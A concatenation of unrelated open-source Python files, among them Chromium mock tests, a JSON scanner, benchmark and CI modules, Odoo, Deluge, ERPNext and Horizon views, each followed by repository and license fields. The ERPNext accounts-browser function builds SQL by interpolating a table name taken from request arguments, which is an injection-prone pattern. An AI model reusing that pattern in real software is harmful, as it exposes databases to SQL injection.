import sys
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)),
'..', '..'))
from chromite.lib import cros_test_lib
from chromite.lib import partial_mock
# pylint: disable=W0212
class ComparatorTest(cros_test_lib.MoxTestCase):
"""Test Comparitor functionality."""
TEST_KEY1 = 'monkey'
TEST_KEY2 = 'foon'
def testEquals(self):
"""__eq__, __ne__ functionality of Comparator classes."""
for cls_name in ['In', 'Regex', 'ListRegex']:
cls = getattr(partial_mock, cls_name)
obj1 = cls(self.TEST_KEY1)
obj2 = cls(self.TEST_KEY1)
obj3 = cls(self.TEST_KEY2)
self.assertEquals(obj1, obj2)
self.assertFalse(obj1 == obj3)
self.assertNotEquals(obj1, obj3)
def testIgnoreEquals(self):
"""Verify __eq__ functionality for Ignore."""
obj1 = partial_mock.Ignore()
obj2 = partial_mock.Ignore()
self.assertEquals(obj1, obj2)
self.assertFalse(obj1 != obj2)
def testListRegex(self):
"""Verify ListRegex match functionality."""
obj = partial_mock.ListRegex('.*monkey.*')
self.assertTrue(obj.Match(['the', 'small monkeys', 'jumped']))
self.assertFalse(obj.Match(['the', 'jumped']))
self.assertFalse(obj.Match(None))
self.assertFalse(obj.Match(1))
class RecursiveCompareTest(cros_test_lib.MoxTestCase):
"""Test recursive compare functionality."""
LHS_DICT = {3: 1, 1: 2}
RHS_DICT = {1: 2, 3: 1}
LIST = [1, 2, 3, 4]
TUPLE = (1, 2, 3, 4)
def TrueHelper(self, lhs, rhs):
self.assertTrue(partial_mock._RecursiveCompare(lhs, rhs))
def FalseHelper(self, lhs, rhs):
self.assertFalse(partial_mock._RecursiveCompare(lhs, rhs))
def testIt(self):
"""Test basic equality cases."""
self.TrueHelper(self.LHS_DICT, self.RHS_DICT)
self.TrueHelper({3: self.LIST, 1: self.LHS_DICT},
{1: self.LHS_DICT, 3: self.LIST})
self.FalseHelper({1: self.LHS_DICT, 3: self.LIST},
{1: self.LHS_DICT, 3: self.LIST + [5]})
self.FalseHelper(self.LIST, self.TUPLE)
def testUnicode(self):
"""Test recursively comparing unicode and non-unicode strings."""
self.assertTrue(partial_mock._RecursiveCompare(['foo'], [u'foo']))
class ListContainsTest(cros_test_lib.MoxTestCase):
"""Unittests for ListContains method."""
L = range(10) + range(10) + [9]
STRICTLY_TRUE_LISTS = [range(10), range(9, 10), range(3, 6), range(1), [],
[9, 9]]
LOOSELY_TRUE_LISTS = [range(0, 10, 2), range(3, 6, 2), [1, 1]]
FALSE_LISTS = [[1.5], [-1], [1, 1, 1], [10], [22], range(6, 11), range(-1, 5)]
def testStrictContains(self):
"""Test ListContains with strict=True."""
for x in self.STRICTLY_TRUE_LISTS:
self.assertTrue(partial_mock.ListContains(x, self.L, strict=True))
for x in self.LOOSELY_TRUE_LISTS + self.FALSE_LISTS:
self.assertFalse(partial_mock.ListContains(x, self.L, strict=True))
def testLooseContains(self):
"""Test ListContains with strict=False."""
for x in self.STRICTLY_TRUE_LISTS + self.LOOSELY_TRUE_LISTS:
self.assertTrue(partial_mock.ListContains(x, self.L))
for x in self.FALSE_LISTS:
self.assertFalse(partial_mock.ListContains(x, self.L))
def testUnicode(self):
"""Test ListContains with unicode and non-unicode strings."""
self.assertTrue(partial_mock.ListContains(['foo'], [u'foo']))
class MockedCallResultsTest(cros_test_lib.MoxTestCase):
"""Test MockedCallResults functionality."""
ARGS = ('abc',)
LIST_ARGS = ([1, 2, 3, 4],)
KWARGS = {'test': 'ing'}
NEW_ENTRY = {'new': 'entry'}
def KwargsHelper(self, result, kwargs, strict=True):
self.mr.AddResultForParams(self.ARGS, result, kwargs=kwargs,
strict=strict)
def setUp(self):
self.mr = partial_mock.MockedCallResults('SomeFunction')
def testNoMock(self):
"""The call is not mocked."""
self.assertRaises(AssertionError, self.mr.LookupResult, self.ARGS)
def testArgReplacement(self):
"""Replacing mocks for args-only calls."""
self.mr.AddResultForParams(self.ARGS, 1)
self.mr.AddResultForParams(self.ARGS, 2)
self.assertEquals(2, self.mr.LookupResult(self.ARGS))
def testKwargsStrictReplacement(self):
"""Replacing strict kwargs mock with another strict mock."""
self.KwargsHelper(1, self.KWARGS)
self.KwargsHelper(2, self.KWARGS)
self.assertEquals(2, self.mr.LookupResult(self.ARGS, kwargs=self.KWARGS))
def testKwargsNonStrictReplacement(self):
"""Replacing strict kwargs mock with nonstrict mock."""
self.KwargsHelper(1, self.KWARGS)
self.KwargsHelper(2, self.KWARGS, strict=False)
self.assertEquals(2, self.mr.LookupResult(self.ARGS, kwargs=self.KWARGS))
def testListArgLookup(self):
"""Matching of arguments containing lists."""
self.mr.AddResultForParams(self.LIST_ARGS, 1)
self.mr.AddResultForParams(self.ARGS, 1)
self.assertEquals(1, self.mr.LookupResult(self.LIST_ARGS))
def testKwargsStrictLookup(self):
"""Strict lookup fails due to extra kwarg."""
self.KwargsHelper(1, self.KWARGS)
kwargs = self.NEW_ENTRY
kwargs.update(self.KWARGS)
self.assertRaises(AssertionError, self.mr.LookupResult, self.ARGS,
kwargs=kwargs)
def testKwargsNonStrictLookup(self):
""""Nonstrict lookup passes with extra kwarg."""
self.KwargsHelper(1, self.KWARGS, strict=False)
kwargs = self.NEW_ENTRY
kwargs.update(self.KWARGS)
self.assertEquals(1, self.mr.LookupResult(self.ARGS, kwargs=kwargs))
def testIgnoreMatching(self):
"""Deep matching of Ignore objects."""
ignore = partial_mock.Ignore()
self.mr.AddResultForParams((ignore, ignore), 1, kwargs={'test': ignore})
self.assertEquals(
1, self.mr.LookupResult(('some', 'values'), {'test': 'bla'}))
def testRegexMatching(self):
"""Regex matching."""
self.mr.AddResultForParams((partial_mock.Regex('pre.ix'),), 1)
self.mr.AddResultForParams((partial_mock.Regex('suffi.'),), 2)
self.assertEquals(1, self.mr.LookupResult(('prefix',)))
self.assertEquals(2, self.mr.LookupResult(('suffix',)))
def testMultipleMatches(self):
"""Lookup matches mutilple results."""
self.mr.AddResultForParams((partial_mock.Ignore(),), 1)
self.mr.AddResultForParams((partial_mock.In('test'),), 2)
self.assertRaises(AssertionError, self.mr.LookupResult, ('test',))
def testDefaultResult(self):
"""Test default result matching."""
self.mr.SetDefaultResult(1)
self.mr.AddResultForParams((partial_mock.In('test'),), 2)
self.assertEquals(1, self.mr.LookupResult(self.ARGS))
self.assertEquals(2, self.mr.LookupResult(('test',)))
def _ExampleHook(self, *args, **kwargs):
"""Example hook for testing."""
self.assertEquals(args, self.LIST_ARGS)
self.assertEquals(kwargs, self.KWARGS)
return 2
def testHook(self):
"""Return value of hook is used as the final result."""
self.mr.AddResultForParams(self.ARGS, 1, side_effect=self._ExampleHook)
self.assertEqual(
2, self.mr.LookupResult(self.ARGS, hook_args=self.LIST_ARGS,
hook_kwargs=self.KWARGS))
def testDefaultHook(self):
"""Verify default hooks are used."""
self.mr.SetDefaultResult(1, self._ExampleHook)
self.mr.AddResultForParams((partial_mock.In('test'),), 3)
self.assertEqual(
2, self.mr.LookupResult(self.ARGS, hook_args=self.LIST_ARGS,
hook_kwargs=self.KWARGS))
self.assertEquals(3, self.mr.LookupResult(('test',)))
if __name__ == '__main__':
cros_test_lib.main()
|
bsd-3-clause
|
Work4Labs/lettuce
|
tests/integration/lib/Django-1.3/django/utils/simplejson/scanner.py
|
928
|
2227
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
make_scanner = c_make_scanner or py_make_scanner
|
gpl-3.0
|
akshara775/PerfKitBenchmarker-master-2
|
perfkitbenchmarker/traces/collectd.py
|
5
|
2992
|
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Records system performance counters during benchmark runs using collectd.
http://collectd.org
"""
import logging
import os
import posixpath
from perfkitbenchmarker import events
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import collectd
flags.DEFINE_boolean('collectd', False,
'Install and run collectd on the guest.')
flags.DEFINE_string('collectd_output', None, 'Path to store collectd results.')
class _CollectdCollector(object):
"""Manages running collectd during a test, and fetching the CSV results."""
def __init__(self, target_dir):
self.target_dir = target_dir
def _FetchResults(self, vm):
"""Stops collectd on the VM, fetches CSV results."""
logging.info('Fetching collectd results')
local_dir = os.path.join(self.target_dir, vm.name + '-collectd')
# On the remote host, CSV files are in:
# self.csv_dir/<fqdn>/<category>.
# Since AWS VMs have a FQDN different from the VM name, we rename locally.
vm.PullFile(local_dir, posixpath.join(collectd.CSV_DIR, '*', ''))
def Before(self, unused_sender, benchmark_spec):
"""Install collectd.
Args:
benchmark_spec: benchmark_spec.BenchmarkSpec. The benchmark currently
running.
"""
logging.info('Installing collectd')
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: vm.Install('collectd'), vms)
def After(self, unused_sender, benchmark_spec):
"""Stop / delete collectd, fetch results from VMs.
Args:
benchmark_spec: benchmark_spec.BenchmarkSpec. The benchmark that stopped
running.
"""
logging.info('Stopping collectd')
vms = benchmark_spec.vms
vm_util.RunThreaded(self._FetchResults, vms)
def Register(parsed_flags):
"""Register the collector if FLAGS.collectd is set."""
if not parsed_flags.collectd:
return
logging.info('Registering collectd collector')
output_directory = parsed_flags.collectd_output or vm_util.GetTempDir()
if not os.path.isdir(output_directory):
raise IOError('collectd output directory does not exist: {0}'.format(
output_directory))
collector = _CollectdCollector(output_directory)
events.before_phase.connect(collector.Before, events.RUN_PHASE, weak=False)
events.after_phase.connect(collector.After, events.RUN_PHASE, weak=False)
|
apache-2.0
|
mollstam/UnrealPy
|
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Python-2.7.10/Misc/Vim/vim_syntax.py
|
34
|
8927
|
from __future__ import with_statement
import keyword
import exceptions
import __builtin__
from string import Template
from sys import subversion
comment_header = '''" Auto-generated Vim syntax file for Python (%s: r%s).
"
" To use: copy or symlink to ~/.vim/syntax/python.vim'''
statement_header = """
if exists("b:current_syntax")
finish
endif"""
statement_footer = '''
" Uncomment the 'minlines' statement line and comment out the 'maxlines'
" statement line; changes behaviour to look at least 2000 lines previously for
" syntax matches instead of at most 200 lines
syn sync match pythonSync grouphere NONE "):$"
syn sync maxlines=200
"syn sync minlines=2000
let b:current_syntax = "python"'''
looping = ('for', 'while')
conditionals = ('if', 'elif', 'else')
boolean_ops = ('and', 'in', 'is', 'not', 'or')
import_stmts = ('import', 'from')
object_defs = ('def', 'class')
exception_names = sorted(exc for exc in dir(exceptions)
if not exc.startswith('__'))
# Need to include functions that start with '__' (e.g., __import__), but
# nothing that comes with modules (e.g., __name__), so just exclude anything in
# the 'exceptions' module since we want to ignore exceptions *and* what any
# module would have
builtin_names = sorted(builtin for builtin in dir(__builtin__)
if builtin not in dir(exceptions))
escapes = (r'+\\[abfnrtv\'"\\]+', r'"\\\o\{1,3}"', r'"\\x\x\{2}"',
r'"\(\\u\x\{4}\|\\U\x\{8}\)"', r'"\\$"')
todos = ("TODO", "FIXME", "XXX")
# XXX codify?
numbers = (r'"\<0x\x\+[Ll]\=\>"', r'"\<\d\+[LljJ]\=\>"',
'"\.\d\+\([eE][+-]\=\d\+\)\=[jJ]\=\>"',
'"\<\d\+\.\([eE][+-]\=\d\+\)\=[jJ]\=\>"',
'"\<\d\+\.\d\+\([eE][+-]\=\d\+\)\=[jJ]\=\>"')
contained = lambda x: "%s contained" % x
def str_regexes():
"""Generator to yield various combinations of strings regexes"""
regex_template = Template('matchgroup=Normal ' +
'start=+[uU]\=${raw}${sep}+ ' +
'end=+${sep}+ ' +
'${skip} ' +
'${contains}')
skip_regex = Template(r'skip=+\\\\\|\\${sep}+')
for raw in ('', '[rR]'):
for separator in ("'", '"', '"""', "'''"):
if len(separator) == 1:
skip = skip_regex.substitute(sep=separator)
else:
skip = ''
contains = 'contains=pythonEscape' if not raw else ''
yield regex_template.substitute(raw=raw, sep=separator, skip=skip,
contains = contains)
space_errors = (r'excludenl "\S\s\+$"ms=s+1', r'" \+\t"', r'"\t\+ "')
statements = (
('',
# XXX Might need to change pythonStatement since have
# specific Repeat, Conditional, Operator, etc. for 'while',
# etc.
[("Statement", "pythonStatement", "keyword",
(kw for kw in keyword.kwlist
if kw not in (looping + conditionals + boolean_ops +
import_stmts + object_defs))
),
("Statement", "pythonStatement", "keyword",
(' '.join(object_defs) +
' nextgroup=pythonFunction skipwhite')),
("Function","pythonFunction", "match",
contained('"[a-zA-Z_][a-zA-Z0-9_]*"')),
("Repeat", "pythonRepeat", "keyword", looping),
("Conditional", "pythonConditional", "keyword",
conditionals),
("Operator", "pythonOperator", "keyword", boolean_ops),
("PreCondit", "pythonPreCondit", "keyword", import_stmts),
("Comment", "pythonComment", "match",
'"#.*$" contains=pythonTodo'),
("Todo", "pythonTodo", "keyword",
contained(' '.join(todos))),
("String", "pythonString", "region", str_regexes()),
("Special", "pythonEscape", "match",
(contained(esc) for esc in escapes
if not '$' in esc)),
("Special", "pythonEscape", "match", r'"\\$"'),
]
),
("python_highlight_numbers",
[("Number", "pythonNumber", "match", numbers)]
),
("python_highlight_builtins",
[("Function", "pythonBuiltin", "keyword", builtin_names)]
),
("python_highlight_exceptions",
[("Exception", "pythonException", "keyword",
exception_names)]
),
("python_highlight_space_errors",
[("Error", "pythonSpaceError", "match",
("display " + err for err in space_errors))]
)
)
def syn_prefix(type_, kind):
return 'syn %s %s ' % (type_, kind)
def fill_stmt(iterable, fill_len):
"""Yield a string that fills at most fill_len characters with strings
returned by 'iterable' and separated by a space"""
# Deal with trailing char to handle ' '.join() calculation
fill_len += 1
overflow = None
it = iter(iterable)
while True:
buffer_ = []
total_len = 0
if overflow:
buffer_.append(overflow)
total_len += len(overflow) + 1
overflow = None
while total_len < fill_len:
try:
new_item = it.next()
buffer_.append(new_item)
total_len += len(new_item) + 1
except StopIteration:
if buffer_:
break
if overflow:
yield overflow
return
if total_len > fill_len:
overflow = buffer_.pop()
total_len -= len(overflow) - 1
ret = ' '.join(buffer_)
assert len(ret) <= fill_len
yield ret
FILL = 80
def main(file_path):
with open(file_path, 'w') as FILE:
# Comment for file
print>>FILE, comment_header % subversion[1:]
print>>FILE, ''
# Statements at start of file
print>>FILE, statement_header
print>>FILE, ''
# Generate case for python_highlight_all
print>>FILE, 'if exists("python_highlight_all")'
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, ' let %s = 1' % statement_var
else:
print>>FILE, 'endif'
print>>FILE, ''
# Generate Python groups
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, 'if exists("%s")' % statement_var
indent = ' '
else:
indent = ''
for colour_group, group, type_, arguments in statement_parts:
if not isinstance(arguments, basestring):
prefix = syn_prefix(type_, group)
if type_ == 'keyword':
stmt_iter = fill_stmt(arguments,
FILL - len(prefix) - len(indent))
try:
while True:
print>>FILE, indent + prefix + stmt_iter.next()
except StopIteration:
print>>FILE, ''
else:
for argument in arguments:
print>>FILE, indent + prefix + argument
else:
print>>FILE, ''
else:
print>>FILE, indent + syn_prefix(type_, group) + arguments
print>>FILE, ''
else:
if statement_var:
print>>FILE, 'endif'
print>>FILE, ''
print>>FILE, ''
# Associating Python group with Vim colour group
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, ' if exists("%s")' % statement_var
indent = ' '
else:
indent = ' '
for colour_group, group, type_, arguments in statement_parts:
print>>FILE, (indent + "hi def link %s %s" %
(group, colour_group))
else:
if statement_var:
print>>FILE, ' endif'
print>>FILE, ''
# Statements at the end of the file
print>>FILE, statement_footer
if __name__ == '__main__':
main("python.vim")
|
mit
|
Alecto3-D/testable-greeter
|
bb-master/sandbox/lib/python3.5/site-packages/buildbot/statistics/storage_backends/influxdb_client.py
|
11
|
2219
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from twisted.python import log
from buildbot import config
from buildbot.statistics.storage_backends.base import StatsStorageBase
try:
from influxdb import InfluxDBClient
except ImportError:
InfluxDBClient = None
class InfluxStorageService(StatsStorageBase):
"""
Delegates data to InfluxDB
"""
def __init__(self, url, port, user, password, db, captures,
name="InfluxStorageService"):
if not InfluxDBClient:
config.error("Python client for InfluxDB not installed.")
return
self.url = url
self.port = port
self.user = user
self.password = password
self.db = db
self.name = name
self.captures = captures
self.client = InfluxDBClient(self.url, self.port, self.user,
self.password, self.db)
self._inited = True
def thd_postStatsValue(self, post_data, series_name, context=None):
if not self._inited:
log.err("Service {0} not initialized".format(self.name))
return
data = {
'measurement': series_name,
'fields': post_data
}
log.msg("Sending data to InfluxDB")
log.msg("post_data: {0!r}".format(post_data))
if context:
log.msg("context: {0!r}".format(context))
data['tags'] = context
self.client.write_points([data])
|
mit
|
naousse/odoo
|
addons/event/wizard/event_confirm.py
|
339
|
1387
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api
class event_confirm(models.TransientModel):
"""Event Confirmation"""
_name = "event.confirm"
@api.multi
def confirm(self):
events = self.env['event.event'].browse(self._context.get('event_ids', []))
events.do_confirm()
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
AmrThabet/CouchPotatoServer
|
libs/synchronousdeluge/client.py
|
151
|
5078
|
import os
import platform
from collections import defaultdict
from itertools import imap
from synchronousdeluge.exceptions import DelugeRPCError
from synchronousdeluge.protocol import DelugeRPCRequest, DelugeRPCResponse
from synchronousdeluge.transfer import DelugeTransfer
__all__ = ["DelugeClient"]
RPC_RESPONSE = 1
RPC_ERROR = 2
RPC_EVENT = 3
class DelugeClient(object):
def __init__(self):
"""A deluge client session."""
self.transfer = DelugeTransfer()
self.modules = []
self._request_counter = 0
def _get_local_auth(self):
auth_file = ""
username = password = ""
if platform.system() in ('Windows', 'Microsoft'):
appDataPath = os.environ.get("APPDATA")
if not appDataPath:
import _winreg
hkey = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders")
appDataReg = _winreg.QueryValueEx(hkey, "AppData")
appDataPath = appDataReg[0]
_winreg.CloseKey(hkey)
auth_file = os.path.join(appDataPath, "deluge", "auth")
else:
from xdg.BaseDirectory import save_config_path
try:
auth_file = os.path.join(save_config_path("deluge"), "auth")
except OSError, e:
return username, password
if os.path.exists(auth_file):
for line in open(auth_file):
if line.startswith("#"):
# This is a comment line
continue
line = line.strip()
try:
lsplit = line.split(":")
except Exception, e:
continue
if len(lsplit) == 2:
username, password = lsplit
elif len(lsplit) == 3:
username, password, level = lsplit
else:
continue
if username == "localclient":
return (username, password)
return ("", "")
def _create_module_method(self, module, method):
fullname = "{0}.{1}".format(module, method)
def func(obj, *args, **kwargs):
return self.remote_call(fullname, *args, **kwargs)
func.__name__ = method
return func
def _introspect(self):
self.modules = []
methods = self.remote_call("daemon.get_method_list").get()
methodmap = defaultdict(dict)
splitter = lambda v: v.split(".")
for module, method in imap(splitter, methods):
methodmap[module][method] = self._create_module_method(module, method)
for module, methods in methodmap.items():
clsname = "DelugeModule{0}".format(module.capitalize())
cls = type(clsname, (), methods)
setattr(self, module, cls())
self.modules.append(module)
def remote_call(self, method, *args, **kwargs):
req = DelugeRPCRequest(self._request_counter, method, *args, **kwargs)
message = next(self.transfer.send_request(req))
response = DelugeRPCResponse()
if not isinstance(message, tuple):
return
if len(message) < 3:
return
message_type = message[0]
# if message_type == RPC_EVENT:
# event = message[1]
# values = message[2]
#
# if event in self._event_handlers:
# for handler in self._event_handlers[event]:
# gevent.spawn(handler, *values)
#
# elif message_type in (RPC_RESPONSE, RPC_ERROR):
if message_type in (RPC_RESPONSE, RPC_ERROR):
request_id = message[1]
value = message[2]
if request_id == self._request_counter :
if message_type == RPC_RESPONSE:
response.set(value)
elif message_type == RPC_ERROR:
err = DelugeRPCError(*value)
response.set_exception(err)
self._request_counter += 1
return response
def connect(self, host="127.0.0.1", port=58846, username="", password=""):
"""Connects to a daemon process.
:param host: str, the hostname of the daemon
:param port: int, the port of the daemon
:param username: str, the username to login with
:param password: str, the password to login with
"""
# Connect transport
self.transfer.connect((host, port))
# Attempt to fetch local auth info if needed
if not username and host in ("127.0.0.1", "localhost"):
username, password = self._get_local_auth()
# Authenticate
self.remote_call("daemon.login", username, password).get()
# Introspect available methods
self._introspect()
@property
def connected(self):
return self.transfer.connected
def disconnect(self):
"""Disconnects from the daemon."""
self.transfer.disconnect()
|
gpl-3.0
|
rohitwaghchaure/erpnext_smart
|
erpnext/accounts/page/accounts_browser/accounts_browser.py
|
34
|
1493
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe.utils import flt
from erpnext.accounts.utils import get_balance_on
@frappe.whitelist()
def get_companies():
"""get a list of companies based on permission"""
return [d.name for d in frappe.get_list("Company", fields=["name"],
order_by="name")]
@frappe.whitelist()
def get_children():
args = frappe.local.form_dict
ctype, company = args['ctype'], args['comp']
# root
if args['parent'] in ("Accounts", "Cost Centers"):
acc = frappe.db.sql(""" select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = ''
and `company` = %s and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
company, as_dict=1)
else:
# other
acc = frappe.db.sql("""select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = %s
and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
args['parent'], as_dict=1)
if ctype == 'Account':
currency = frappe.db.sql("select default_currency from `tabCompany` where name = %s", company)[0][0]
for each in acc:
bal = get_balance_on(each.get("value"))
each["currency"] = currency
each["balance"] = flt(bal)
return acc
|
agpl-3.0
|
frreiss/tensorflow-fred
|
tensorflow/python/framework/ops_enable_eager_test.py
|
28
|
1702
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests enabling eager execution at process level."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.platform import googletest
class OpsEnableAndDisableEagerTest(googletest.TestCase):
def setUp(self):
# test for enable eager test
ops.enable_eager_execution()
self.assertTrue(context.executing_eagerly())
# Calling enable eager execution a second time should not cause an error.
ops.enable_eager_execution()
self.assertTrue(context.executing_eagerly())
def tearDown(self):
# test for disable eager test
ops.disable_eager_execution()
self.assertFalse(context.executing_eagerly())
# Calling disable eager execution a second time should not cause an error.
ops.disable_eager_execution()
self.assertFalse(context.executing_eagerly())
if __name__ == '__main__':
googletest.main()
|
apache-2.0
|
philoniare/horizon
|
openstack_dashboard/dashboards/admin/flavors/views.py
|
14
|
2910
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import tables
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.flavors \
import tables as project_tables
from openstack_dashboard.dashboards.admin.flavors \
import workflows as flavor_workflows
INDEX_URL = "horizon:admin:flavors:index"
class IndexView(tables.DataTableView):
table_class = project_tables.FlavorsTable
template_name = 'admin/flavors/index.html'
page_title = _("Flavors")
def get_data(self):
request = self.request
flavors = []
try:
# "is_public=None" will return all flavors.
flavors = api.nova.flavor_list(request, None)
except Exception:
exceptions.handle(request,
_('Unable to retrieve flavor list.'))
# Sort flavors by size
flavors.sort(key=lambda f: (f.vcpus, f.ram, f.disk))
return flavors
class CreateView(workflows.WorkflowView):
workflow_class = flavor_workflows.CreateFlavor
template_name = 'admin/flavors/create.html'
page_title = _("Create Flavor")
class UpdateView(workflows.WorkflowView):
workflow_class = flavor_workflows.UpdateFlavor
template_name = 'admin/flavors/update.html'
page_title = _("Edit Flavor")
def get_initial(self):
flavor_id = self.kwargs['id']
try:
# Get initial flavor information
flavor = api.nova.flavor_get(self.request, flavor_id)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve flavor details.'),
redirect=reverse_lazy(INDEX_URL))
return {'flavor_id': flavor.id,
'name': flavor.name,
'vcpus': flavor.vcpus,
'memory_mb': flavor.ram,
'disk_gb': flavor.disk,
'swap_mb': flavor.swap or 0,
'eph_gb': getattr(flavor, 'OS-FLV-EXT-DATA:ephemeral', None)}
|
apache-2.0
|
sgraham/nope
|
tools/security/check_message_owners.py
|
105
|
1506
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make sure all of the per-file *_messages.h OWNERS are consistent"""
import os
import re
import sys
def main():
file_path = os.path.dirname(__file__);
root_dir = os.path.abspath(os.path.join(file_path, '..', '..'))
owners = collect_owners(root_dir)
all_owners = get_all_owners(owners)
print_missing_owners(owners, all_owners)
return 0
def collect_owners(root_dir):
result = {}
for root, dirs, files in os.walk(root_dir):
if "OWNERS" in files:
owner_file_path = os.path.join(root, "OWNERS")
owner_set = extract_owners_from_file(owner_file_path)
if owner_set:
result[owner_file_path] = owner_set
return result
def extract_owners_from_file(owner_file_path):
result = set()
regexp = re.compile('^per-file.*_messages[^=]*=\s*(.*)@([^#]*)')
with open(owner_file_path) as f:
for line in f:
match = regexp.match(line)
if match:
result.add(match.group(1).strip())
return result
def get_all_owners(owner_dict):
result = set()
for key in owner_dict:
result = result.union(owner_dict[key])
return result
def print_missing_owners(owner_dict, owner_set):
for key in owner_dict:
for owner in owner_set:
if not owner in owner_dict[key]:
print key + " is missing " + owner
if '__main__' == __name__:
sys.exit(main())
|
bsd-3-clause
|
zlorenz/synergy
|
synergy/config/urls.py
|
1
|
1532
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
